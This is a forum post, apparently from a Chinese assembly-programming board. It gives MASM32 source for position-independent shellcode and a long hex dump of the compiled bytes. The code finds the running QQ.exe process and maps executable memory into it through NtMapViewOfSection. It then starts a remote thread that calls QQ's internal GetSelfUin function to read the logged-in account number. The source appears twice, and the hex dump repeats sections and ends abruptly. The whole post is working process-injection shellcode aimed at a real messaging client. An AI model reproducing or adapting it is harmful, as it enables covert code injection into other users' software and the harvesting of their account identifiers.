|
#2
zklhp2013-01-07 19:19
|
代码预览:
代码:
程序代码:.386
.model flat, stdcall
option casemap :none
include windows.inc
includelib user32.lib
include myMacro.asm
injectCode proto
.CODE
DeBug = 1 ;调试模式,会增大体积,发行时请注释掉
; SHELLCODE 新构架 设置导入表,注意,这里都不用双引号
Import MyIAT, Kernel32,GetModuleHandleA,GetProcAddress,Process32First,CreateToolhelp32Snapshot,lstrcmpiA,Process32Next,CloseHandle,\
CreateRemoteThread,OpenProcess,LoadLibraryA,WaitForSingleObject,GetExitCodeThread,CreateFileMappingA,GetCurrentProcessId
Import MyIAT, Kernel32,RtlMoveMemory,OutputDebugStringA
Import MyIAT, ntdll,NtMapViewOfSection
Import MyIAT, user32,wsprintfA
Import injectIAT, Kernel32,GetModuleHandleA,GetProcAddress
jmp START
injectCode proc
%echo injectCode,__GetBuffSize__,num2str(__GetBuffSize__(injectIAT))
local APIArrayBuff[__GetBuffSize__(injectIAT)]:DWORD
LdrImport injectIAT,APIArrayBuff ;载入所有导入表中的APi
ImportApiCall GetModuleHandleA,"KernelUtil.dll"
.if eax
ImportApiCall GetProcAddress,eax,"?GetSelfUin@Contact@Util@@YAKXZ"
.if eax
call eax ; get qq num return eax
ret
.endif
.endif
xor eax,eax
injectCode endp
injectCodeEnd:
injectCodelen = injectCodeEnd-injectCode
START proc
local APIArrayBuff[__GetBuffSize__(MyIAT)]:DWORD ;设置一个API缓冲区,可以使用常量__APiNumber__
LOCAL info:PROCESSENTRY32
LOCAL handle:HANDLE
LOCAL hProcess1:HANDLE,hProcess2:HANDLE
local hMappedFile:HANDLE,ViewBase1:DWORD,ViewBase2:DWORD,ViewSize:DWORD,radr:dword
LOCAL hRemoteThread:dword,Return_Value:dword
local @QQUid[16]:BYTE
%echo MyIAT,__GetBuffSize__,num2str(__GetBuffSize__(MyIAT))
pushad
LdrImport MyIAT,APIArrayBuff ;载入所有导入表中的API
mov ViewSize,1024*4
ImportApiCall CreateFileMappingA, INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE , 0, 1024*4, NULL
mov hMappedFile,eax
ImportApiCall GetCurrentProcessId
ImportApiCall OpenProcess, PROCESS_ALL_ACCESS,FALSE,eax
mov hProcess2,eax
and ViewBase2,0 ;在win7不清空会出错
ImportApiCall NtMapViewOfSection,hMappedFile,hProcess2,addr ViewBase2,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE
.if eax>=0
BaseRelocations eax
lea eax,[offset injectCode + eax] ;别忘了重定位
mov radr,eax
ImportApiCall RtlMoveMemory,ViewBase2,radr,injectCodelen
ImportApiCall CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0 ;进程快照
mov handle,eax
mov info.dwSize,sizeof PROCESSENTRY32
ImportApiCall Process32First,handle,addr info
.repeat
ImportApiCall lstrcmpiA,addr info.szExeFile,"QQ.exe" ;比较是否为我们要找的进程名,不区分大小写
.if !eax
ImportApiCall OpenProcess,4095, 0,info.th32ProcessID
.if eax
mov hProcess1,eax
and ViewBase1,0
mov ViewSize,1024*4
ImportApiCall NtMapViewOfSection,hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE
.if eax>=0
ImportApiCall CreateRemoteThread,hProcess1,0,0,ViewBase1,0,0,0
.if eax
mov hRemoteThread,eax
ImportApiCall WaitForSingleObject,hRemoteThread, INFINITE
ImportApiCall GetExitCodeThread,hRemoteThread, addr Return_Value
push esi
mov esi,esp
ImportApiCall wsprintfA,addr @QQUid,"获取到QQ号:%d",Return_Value
ImportApiCall OutputDebugStringA,addr @QQUid
mov esp,esi
pop esi
ImportApiCall CloseHandle,hRemoteThread
.endif
.endif
ImportApiCall CloseHandle,hProcess1
.endif
.endif
ImportApiCall Process32Next,handle,addr info
.until !eax
ImportApiCall CloseHandle,handle
.endif
ImportApiCall CloseHandle,hProcess2
popad
ret
START endp
end START
.model flat, stdcall
option casemap :none
include windows.inc
includelib user32.lib
include myMacro.asm
injectCode proto
.CODE
DeBug = 1 ;调试模式,会增大体积,发行时请注释掉
; SHELLCODE 新构架 设置导入表,注意,这里都不用双引号
Import MyIAT, Kernel32,GetModuleHandleA,GetProcAddress,Process32First,CreateToolhelp32Snapshot,lstrcmpiA,Process32Next,CloseHandle,\
CreateRemoteThread,OpenProcess,LoadLibraryA,WaitForSingleObject,GetExitCodeThread,CreateFileMappingA,GetCurrentProcessId
Import MyIAT, Kernel32,RtlMoveMemory,OutputDebugStringA
Import MyIAT, ntdll,NtMapViewOfSection
Import MyIAT, user32,wsprintfA
Import injectIAT, Kernel32,GetModuleHandleA,GetProcAddress
jmp START
injectCode proc
%echo injectCode,__GetBuffSize__,num2str(__GetBuffSize__(injectIAT))
local APIArrayBuff[__GetBuffSize__(injectIAT)]:DWORD
LdrImport injectIAT,APIArrayBuff ;载入所有导入表中的APi
ImportApiCall GetModuleHandleA,"KernelUtil.dll"
.if eax
ImportApiCall GetProcAddress,eax,"?GetSelfUin@Contact@Util@@YAKXZ"
.if eax
call eax ; get qq num return eax
ret
.endif
.endif
xor eax,eax
injectCode endp
injectCodeEnd:
injectCodelen = injectCodeEnd-injectCode
START proc
local APIArrayBuff[__GetBuffSize__(MyIAT)]:DWORD ;设置一个API缓冲区,可以使用常量__APiNumber__
LOCAL info:PROCESSENTRY32
LOCAL handle:HANDLE
LOCAL hProcess1:HANDLE,hProcess2:HANDLE
local hMappedFile:HANDLE,ViewBase1:DWORD,ViewBase2:DWORD,ViewSize:DWORD,radr:dword
LOCAL hRemoteThread:dword,Return_Value:dword
local @QQUid[16]:BYTE
%echo MyIAT,__GetBuffSize__,num2str(__GetBuffSize__(MyIAT))
pushad
LdrImport MyIAT,APIArrayBuff ;载入所有导入表中的API
mov ViewSize,1024*4
ImportApiCall CreateFileMappingA, INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE , 0, 1024*4, NULL
mov hMappedFile,eax
ImportApiCall GetCurrentProcessId
ImportApiCall OpenProcess, PROCESS_ALL_ACCESS,FALSE,eax
mov hProcess2,eax
and ViewBase2,0 ;在win7不清空会出错
ImportApiCall NtMapViewOfSection,hMappedFile,hProcess2,addr ViewBase2,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE
.if eax>=0
BaseRelocations eax
lea eax,[offset injectCode + eax] ;别忘了重定位
mov radr,eax
ImportApiCall RtlMoveMemory,ViewBase2,radr,injectCodelen
ImportApiCall CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0 ;进程快照
mov handle,eax
mov info.dwSize,sizeof PROCESSENTRY32
ImportApiCall Process32First,handle,addr info
.repeat
ImportApiCall lstrcmpiA,addr info.szExeFile,"QQ.exe" ;比较是否为我们要找的进程名,不区分大小写
.if !eax
ImportApiCall OpenProcess,4095, 0,info.th32ProcessID
.if eax
mov hProcess1,eax
and ViewBase1,0
mov ViewSize,1024*4
ImportApiCall NtMapViewOfSection,hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE
.if eax>=0
ImportApiCall CreateRemoteThread,hProcess1,0,0,ViewBase1,0,0,0
.if eax
mov hRemoteThread,eax
ImportApiCall WaitForSingleObject,hRemoteThread, INFINITE
ImportApiCall GetExitCodeThread,hRemoteThread, addr Return_Value
push esi
mov esi,esp
ImportApiCall wsprintfA,addr @QQUid,"获取到QQ号:%d",Return_Value
ImportApiCall OutputDebugStringA,addr @QQUid
mov esp,esi
pop esi
ImportApiCall CloseHandle,hRemoteThread
.endif
.endif
ImportApiCall CloseHandle,hProcess1
.endif
.endif
ImportApiCall Process32Next,handle,addr info
.until !eax
ImportApiCall CloseHandle,handle
.endif
ImportApiCall CloseHandle,hProcess2
popad
ret
START endp
end START
下面是调试输出模式的shellcode:
代码:
E9 E2 02 00 00 55 8B EC 83 C4 F8 60 83 EC 14 83 24 24 00 1E 0F A0 1F 33 C0 40 D1 E0 40 C1 E0 04
8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B D0 8B 42 3C 8B 44
10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 33 C9 8B
3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48 18 72 E2 59 83 C4
08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04 E8 0D 00 00 00 4C
6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65 74 4D 6F 64 75 6C
65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 13 00 00 00 4F 75 74 70 75 74 44 65 62 75 67
53 74 72 69 6E 67 41 00 57 FF D6 89 44 24 10 8B 44 24 10 89 45 00 E8 0C 00 00 00 44 65 62 75 67
20 6D 6F 64 65 21 00 FF 54 24 14 E8 0A 00 00 00 4B 65 72 6E 65 6C 33 32 00 02 5E E8 20 00 00 00
47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00
5F B9 01 00 00 00 E9 A2 00 00 00 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 68 8B D8
56 E8 95 00 00 00 8D 74 30 02 0F B6 4E FF EB 50 51 57 53 FF 54 24 14 0B C0 74 0E 8B 4C 24 08 89
44 8D F8 FF 44 24 08 EB 2B E8 1D 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 20 66 61 69
6C 2C 41 50 49 4E 61 6D 65 3A 00 FF 54 24 1C 57 FF 54 24 1C 57 E8 41 00 00 00 8D 7C 38 01 59 49
0B C9 75 AC EB 25 E8 17 00 00 00 44 6C 6C 20 6C 6F 61 64 20 66 61 69 6C 2C 44 4C 4C 4E 61 6D 65
3A 00 FF 54 24 18 56 FF 54 24 18 59 49 0B C9 0F 85 56 FF FF FF 83 C4 14 61 EB 17 57 8B 7C 24 08
B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 60 E8 30 00 00 00 69 6E 6A 65 63 74 49 41
54 3A 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 09 09 09 28 22 4B 65 72 6E 65 6C 55 74 69
6C 2E 64 6C 6C 22 29 00 FF 55 00 61 E8 0F 00 00 00 4B 65 72 6E 65 6C 55 74 69 6C 2E 64 6C 6C 00
FF 55 F8 0B C0 74 7E 60 E8 43 00 00 00 69 6E 6A 65 63 74 49 41 54 3A 47 65 74 50 72 6F 63 41 64
64 72 65 73 73 09 09 09 28 65 61 78 2C 22 3F 47 65 74 53 65 6C 66 55 69 6E 40 43 6F 6E 74 61 63
74 40 55 74 69 6C 40 40 59 41 4B 58 5A 22 29 00 FF 55 00 61 E8 20 00 00 00 3F 47 65 74 53 65 6C
66 55 69 6E 40 43 6F 6E 74 61 63 74 40 55 74 69 6C 40 40 59 41 4B 58 5A 00 50 FF 55 FC 0B C0 74
04 FF D0 C9 C3 33 C0 55 8B EC 81 C4 58 FE FF FF 60 60 83 EC 14 83 24 24 00 1E 0F A0 1F 33 C0 40
D1 E0 40 C1 E0 04 8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B
D0 8B 42 3C 8B 44 10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65
73 73 00 33 C9 8B 3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48
18 72 E2 59 83 C4 08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04
E8 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65
74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 13 00 00 00 4F 75 74 70 75
74 44 65 62 75 67 53 74 72 69 6E 67 41 00 57 FF D6 89 44 24 10 8B 44 24 10 89 45 00 E8 0C 00 00
00 44 65 62 75 67 20 6D 6F 64 65 21 00 FF 54 24 14 E8 23 00 00 00 4B 65 72 6E 65 6C 33 32 00 0E
4B 65 72 6E 65 6C 33 32 00 02 6E 74 64 6C 6C 00 01 75 73 65 72 33 32 00 01 5E E8 23 01 00 00 47
65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 50
72 6F 63 65 73 73 33 32 46 69 72 73 74 00 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E
61 70 73 68 6F 74 00 6C 73 74 72 63 6D 70 69 41 00 50 72 6F 63 65 73 73 33 32 4E 65 78 74 00 43
6C 6F 73 65 48 61 6E 64 6C 65 00 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64 00 4F 70
65 6E 50 72 6F 63 65 73 73 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 61 69 74 46 6F 72 53 69
6E 67 6C 65 4F 62 6A 65 63 74 00 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 00 43 72 65
61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73
73 49 64 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 4F 75 74 70 75 74 44 65 62 75 67 53 74 72
69 6E 67 41 00 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 00 77 73 70 72 69 6E 74 66
41 00 5F B9 04 00 00 00 E9 A2 00 00 00 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 68
8B D8 56 E8 95 00 00 00 8D 74 30 02 0F B6 4E FF EB 50 51 57 53 FF 54 24 14 0B C0 74 0E 8B 4C 24
08 89 44 8D B8 FF 44 24 08 EB 2B E8 1D 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 20 66
61 69 6C 2C 41 50 49 4E 61 6D 65 3A 00 FF 54 24 1C 57 FF 54 24 1C 57 E8 41 00 00 00 8D 7C 38 01
59 49 0B C9 75 AC EB 25 E8 17 00 00 00 44 6C 6C 20 6C 6F 61 64 20 66 61 69 6C 2C 44 4C 4C 4E 61
6D 65 3A 00 FF 54 24 18 56 FF 54 24 18 59 49 0B C9 0F 85 56 FF FF FF 83 C4 14 61 EB 17 57 8B 7C
24 08 B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 C7 85 74 FE FF FF 00 10 00 00 60 E8
5C 00 00 00 4D 79 49 41 54 3A 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 09 09 09 28
49 4E 56 41 4C 49 44 5F 48 41 4E 44 4C 45 5F 56 41 4C 55 45 2C 4E 55 4C 4C 2C 50 41 47 45 5F 45
58 45 43 55 54 45 5F 52 45 41 44 57 52 49 54 45 2C 30 2C 31 30 32 34 2A 34 2C 4E 55 4C 4C 29 00
FF 55 00 61 6A 00 68 00 10 00 00 6A 00 6A 40 6A 00 6A FF FF 55 E8 89 85 80 FE FF FF 60 E8 1F 00
00 00 4D 79 49 41 54 3A 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73 73 49 64 09 09 09 28 29
00 FF 55 00 61 FF 55 EC 60 E8 33 00 00 00 4D 79 49 41 54 3A 4F 70 65 6E 50 72 6F 63 65 73 73 09
09 09 28 50 52 4F 43 45 53 53 5F 41 4C 4C 5F 41 43 43 45 53 53 2C 46 41 4C 53 45 2C 65 61 78 29
00 FF 55 00 61 50 6A 00 68 FF 0F 1F 00 FF 55 D8 89 85 84 FE FF FF 83 A5 78 FE FF FF 00 60 E8 71
00 00 00 4D 79 49 41 54 3A 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 09 09 09 28 68
4D 61 70 70 65 64 46 69 6C 65 2C 68 50 72 6F 63 65 73 73 32 2C 61 64 64 72 20 56 69 65 77 42 61
73 65 32 2C 30 2C 30 2C 30 2C 61 64 64 72 20 56 69 65 77 53 69 7A 65 2C 31 2C 30 2C 50 41 47 45
5F 45 58 45 43 55 54 45 5F 52 45 41 44 57 52 49 54 45 29 00 FF 55 00 61 6A 40 6A 00 6A 01 8D 85
74 FE FF FF 50 6A 00 6A 00 6A 00 8D 85 78 FE FF FF 50 FF B5 84 FE FF FF FF B5 80 FE FF FF FF 55
F8 83 F8 00 0F 82 16 05 00 00 E8 00 00 00 00 81 2C 24 CF 17 40 00 58 8D 80 05 10 40 00 89 85 70
FE FF FF 60 E8 35 00 00 00 4D 79 49 41 54 3A 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 09 09 09 28
56 69 65 77 42 61 73 65 32 2C 72 61 64 72 2C 69 6E 6A 65 63 74 43 6F 64 65 6C 65 6E 29 00 FF 55
00 61 68 E2 02 00 00 FF B5 70 FE FF FF FF B5 78 FE FF FF FF 55 F0 60 E8 38 00 00 00 4D 79 49 41
54 3A 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E 61 70 73 68 6F 74 09 09 09 28 54 48
33 32 43 53 5F 53 4E 41 50 50 52 4F 43 45 53 53 2C 30 29 00 FF 55 00 61 6A 00 6A 02 FF 55 C4 89
85 8C FE FF FF C7 85 90 FE FF FF 28 01 00 00 60 E8 2A 00 00 00 4D 79 49 41 54 3A 50 72 6F 63 65
73 73 33 32 46 69 72 73 74 09 09 09 28 68 61 6E 64 6C 65 2C 61 64 64 72 20 69 6E 66 6F 29 00 FF
55 00 61 8D 85 90 FE FF FF 50 FF B5 8C FE FF FF FF 55 C0 60 E8 31 00 00 00 4D 79 49 41 54 3A 6C
73 74 72 63 6D 70 69 41 09 09 09 28 61 64 64 72 20 69 6E 66 6F 2E 73 7A 45 78 65 46 69 6C 65 2C
22 51 51 2E 65 78 65 22 29 00 FF 55 00 61 E8 07 00 00 00 51 51 2E 65 78 65 00 8D 85 B4 FE FF FF
50 FF 55 C8 0B C0 0F 85 39 03 00 00 60 E8 30 00 00 00 4D 79 49 41 54 3A 4F 70 65 6E 50 72 6F 63
65 73 73 09 09 09 28 34 30 39 35 2C 30 2C 69 6E 66 6F 2E 74 68 33 32 50 72 6F 63 65 73 73 49 44
29 00 FF 55 00 61 FF B5 98 FE FF FF 6A 00 68 FF 0F 00 00 FF 55 D8 0B C0 0F 84 E7 02 00 00 89 85
88 FE FF FF 83 A5 7C FE FF FF 00 C7 85 74 FE FF FF 00 10 00 00 60 E8 71 00 00 00 4D 79 49 41 54
3A 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 09 09 09 28 68 4D 61 70 70 65 64 46 69
6C 65 2C 68 50 72 6F 63 65 73 73 31 2C 61 64 64 72 20 56 69 65 77 42 61 73 65 31 2C 30 2C 30 2C
30 2C 61 64 64 72 20 56 69 65 77 53 69 7A 65 2C 31 2C 30 2C 50 41 47 45 5F 45 58 45 43 55 54 45
5F 52 45 41 44 57 52 49 54 45 29 00 FF 55 00 61 6A 40 6A 00 6A 01 8D 85 74 FE FF FF 50 6A 00 6A
00 6A 00 8D 85 7C FE FF FF 50 FF B5 88 FE FF FF FF B5 80 FE FF FF FF 55 F8 83 F8 00 0F 82 F0 01
00 00 60 E8 3B 00 00 00 4D 79 49 41 54 3A 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64
09 09 09 28 68 50 72 6F 63 65 73 73 31 2C 30 2C 30 2C 56 69 65 77 42 61 73 65 31 2C 30 2C 30 2C
30 29 00 FF 55 00 61 6A 00 6A 00 6A 00 FF B5 7C FE FF FF 6A 00 6A 00 FF B5 88 FE FF FF FF 55 D4
0B C0 0F 84 8A 01 00 00 89 85 6C FE FF FF 60 E8 35 00 00 00 4D 79 49 41 54 3A 57 61 69 74 46 6F
72 53 69 6E 67 6C 65 4F 62 6A 65 63 74 09 09 09 28 68 52 65 6D 6F 74 65 54 68 72 65 61 64 2C 49
4E 46 49 4E 49 54 45 29 00 FF 55 00 61 6A FF FF B5 6C FE FF FF FF 55 E0 60 E8 3C 00 00 00 4D 79
49 41 54 3A 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 09 09 09 28 68 52 65 6D 6F 74 65
54 68 72 65 61 64 2C 61 64 64 72 20 52 65 74 75 72 6E 5F 56 61 6C 75 65 29 00 FF 55 00 61 8D 85
68 FE FF FF 50 FF B5 6C FE FF FF FF 55 E4 56 8B F4 60 E8 3D 00 00 00 4D 79 49 41 54 3A 77 73 70
72 69 6E 74 66 41 09 09 09 28 61 64 64 72 20 40 51 51 55 69 64 2C 22 BB F1 C8 A1 B5 BD 51 51 BA
C5 3A 25 64 22 2C 52 65 74 75 72 6E 5F 56 61 6C 75 65 29 00 FF 55 00 61 FF B5 68 FE FF FF E8 0E
00 00 00 BB F1 C8 A1 B5 BD 51 51 BA C5 3A 25 64 00 8D 85 58 FE FF FF 50 FF 55 FC 60 E8 29 00 00
00 4D 79 49 41 54 3A 4F 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6E 67 41 09 09 09 28 61 64 64
72 20 40 51 51 55 69 64 29 00 FF 55 00 61 8D 85 58 FE FF FF 50 FF 55 F4 8B E6 5E 60 E8 24 00 00
00 4D 79 49 41 54 3A 43 6C 6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 52 65 6D 6F 74 65 54 68 72
65 61 64 29 00 FF 55 00 61 FF B5 6C FE FF FF FF 55 D0 60 E8 20 00 00 00 4D 79 49 41 54 3A 43 6C
6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 50 72 6F 63 65 73 73 31 29 00 FF 55 00 61 FF B5 88 FE
FF FF FF 55 D0 60 E8 29 00 00 00 4D 79 49 41 54 3A 50 72 6F 63 65 73 73 33 32 4E 65 78 74 09 09
09 28 68 61 6E 64 6C 65 2C 61 64 64 72 20 69 6E 66 6F 29 00 FF 55 00 61 8D 85 90 FE FF FF 50 FF
B5 8C FE FF FF FF 55 CC 0B C0 0F 85 23 FC FF FF 60 E8 1D 00 00 00 4D 79 49 41 54 3A 43 6C 6F 73
65 48 61 6E 64 6C 65 09 09 09 28 68 61 6E 64 6C 65 29 00 FF 55 00 61 FF B5 8C FE FF FF FF 55 D0
60 E8 20 00 00 00 4D 79 49 41 54 3A 43 6C 6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 50 72 6F 63
65 73 73 32 29 00 FF 55 00 61 FF B5 84 FE FF FF FF 55 D0 61 C9 C3
8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B D0 8B 42 3C 8B 44
10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 33 C9 8B
3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48 18 72 E2 59 83 C4
08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04 E8 0D 00 00 00 4C
6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65 74 4D 6F 64 75 6C
65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 13 00 00 00 4F 75 74 70 75 74 44 65 62 75 67
53 74 72 69 6E 67 41 00 57 FF D6 89 44 24 10 8B 44 24 10 89 45 00 E8 0C 00 00 00 44 65 62 75 67
20 6D 6F 64 65 21 00 FF 54 24 14 E8 0A 00 00 00 4B 65 72 6E 65 6C 33 32 00 02 5E E8 20 00 00 00
47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00
5F B9 01 00 00 00 E9 A2 00 00 00 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 68 8B D8
56 E8 95 00 00 00 8D 74 30 02 0F B6 4E FF EB 50 51 57 53 FF 54 24 14 0B C0 74 0E 8B 4C 24 08 89
44 8D F8 FF 44 24 08 EB 2B E8 1D 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 20 66 61 69
6C 2C 41 50 49 4E 61 6D 65 3A 00 FF 54 24 1C 57 FF 54 24 1C 57 E8 41 00 00 00 8D 7C 38 01 59 49
0B C9 75 AC EB 25 E8 17 00 00 00 44 6C 6C 20 6C 6F 61 64 20 66 61 69 6C 2C 44 4C 4C 4E 61 6D 65
3A 00 FF 54 24 18 56 FF 54 24 18 59 49 0B C9 0F 85 56 FF FF FF 83 C4 14 61 EB 17 57 8B 7C 24 08
B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 60 E8 30 00 00 00 69 6E 6A 65 63 74 49 41
54 3A 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 09 09 09 28 22 4B 65 72 6E 65 6C 55 74 69
6C 2E 64 6C 6C 22 29 00 FF 55 00 61 E8 0F 00 00 00 4B 65 72 6E 65 6C 55 74 69 6C 2E 64 6C 6C 00
FF 55 F8 0B C0 74 7E 60 E8 43 00 00 00 69 6E 6A 65 63 74 49 41 54 3A 47 65 74 50 72 6F 63 41 64
64 72 65 73 73 09 09 09 28 65 61 78 2C 22 3F 47 65 74 53 65 6C 66 55 69 6E 40 43 6F 6E 74 61 63
74 40 55 74 69 6C 40 40 59 41 4B 58 5A 22 29 00 FF 55 00 61 E8 20 00 00 00 3F 47 65 74 53 65 6C
66 55 69 6E 40 43 6F 6E 74 61 63 74 40 55 74 69 6C 40 40 59 41 4B 58 5A 00 50 FF 55 FC 0B C0 74
04 FF D0 C9 C3 33 C0 55 8B EC 81 C4 58 FE FF FF 60 60 83 EC 14 83 24 24 00 1E 0F A0 1F 33 C0 40
D1 E0 40 C1 E0 04 8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B
D0 8B 42 3C 8B 44 10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65
73 73 00 33 C9 8B 3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48
18 72 E2 59 83 C4 08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04
E8 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65
74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 13 00 00 00 4F 75 74 70 75
74 44 65 62 75 67 53 74 72 69 6E 67 41 00 57 FF D6 89 44 24 10 8B 44 24 10 89 45 00 E8 0C 00 00
00 44 65 62 75 67 20 6D 6F 64 65 21 00 FF 54 24 14 E8 23 00 00 00 4B 65 72 6E 65 6C 33 32 00 0E
4B 65 72 6E 65 6C 33 32 00 02 6E 74 64 6C 6C 00 01 75 73 65 72 33 32 00 01 5E E8 23 01 00 00 47
65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 50
72 6F 63 65 73 73 33 32 46 69 72 73 74 00 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E
61 70 73 68 6F 74 00 6C 73 74 72 63 6D 70 69 41 00 50 72 6F 63 65 73 73 33 32 4E 65 78 74 00 43
6C 6F 73 65 48 61 6E 64 6C 65 00 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64 00 4F 70
65 6E 50 72 6F 63 65 73 73 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 61 69 74 46 6F 72 53 69
6E 67 6C 65 4F 62 6A 65 63 74 00 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 00 43 72 65
61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73
73 49 64 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 4F 75 74 70 75 74 44 65 62 75 67 53 74 72
69 6E 67 41 00 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 00 77 73 70 72 69 6E 74 66
41 00 5F B9 04 00 00 00 E9 A2 00 00 00 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 68
8B D8 56 E8 95 00 00 00 8D 74 30 02 0F B6 4E FF EB 50 51 57 53 FF 54 24 14 0B C0 74 0E 8B 4C 24
08 89 44 8D B8 FF 44 24 08 EB 2B E8 1D 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 20 66
61 69 6C 2C 41 50 49 4E 61 6D 65 3A 00 FF 54 24 1C 57 FF 54 24 1C 57 E8 41 00 00 00 8D 7C 38 01
59 49 0B C9 75 AC EB 25 E8 17 00 00 00 44 6C 6C 20 6C 6F 61 64 20 66 61 69 6C 2C 44 4C 4C 4E 61
6D 65 3A 00 FF 54 24 18 56 FF 54 24 18 59 49 0B C9 0F 85 56 FF FF FF 83 C4 14 61 EB 17 57 8B 7C
